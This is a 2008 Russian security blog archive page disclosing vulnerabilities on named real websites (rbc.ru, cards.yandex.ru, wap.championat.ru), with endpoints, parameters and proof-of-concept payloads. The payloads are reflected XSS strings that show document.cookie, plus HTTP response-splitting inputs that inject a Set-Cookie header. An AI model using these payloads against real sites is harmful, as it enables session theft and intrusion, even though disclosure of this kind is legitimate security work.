Архив раздела Январь, 2008
Уязвимости на проектах РосБизнесКонсалтинга
XSS-уязвимости и раскрытие исходного кода на rbc.ru
Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
Приложение: /cur/cgi-bin/templater.cgi
GET-переменные: ticker_to_name, ticker_from, ticker_to, sum, course
Примеры:
?cfg=converter&ticker_to_name=<script>alert(document.cookie)</script>
? т.д. Варианты всевозможные.
Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
Приложение: /fnews.demo
GET-переменные: ticker_to_name, ticker_from, ticker_to, sum, course
Примеры:
/?”onmouseover=”alert(document.cookie) - Работает в IE.
Тип уязвимости: Раскрытие исходного кода (Source code disclosure) ->> Внедрение […]
Читать полностью..>>Уязвимость на cards.yandex.ru
XSS-уязвимость на cards.yandex.ru.
Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
Приложение: /my-card.xml
Примеры:
/my-card.xml?hash=some_hash”,eval(alert(document.cookie)),”
Чем опасно? Читаем здесь - http://www.webappsec.org/projects/threat/v1/WASC-TC-v1_0.rus.doc
Уязвимости в проекте SUP Fabrik - championat.ru
Уязвимости wap.championat.ru (pda-версия самого популярного спортивного портала).
?так, продолжаем серию публикаций об уязвимостях в проектах SUP Fabrik.
Тип уязвимости: Расщепление HTTP-запроса (HTTP Response Splitting)
Приложение: /click, параметр uri
Примеры:
- /click?uri=%0d%0aSet-Cookie:mysite=fuzzing.ru%0a%0d%0a%0dBodyContent
- /click?uri=%0aSet-Cookie:mysite=fuzzing.ru%0a%0d%0a%0dBodyContent
Чем опасно? Читаем здесь - http://www.webappsec.org/projects/threat/v1/WASC-TC-v1_0.rus.doc
Тип уязвимости: Доступен метод TRACE
Приложение: Nginx, Apache
Подсказка: Метод доступен на backend’е. Начиная с версии 0.5.17 nginx на TRACE возвращает 405, либо необходимо закрывать на Apache.
Чем опасно? […]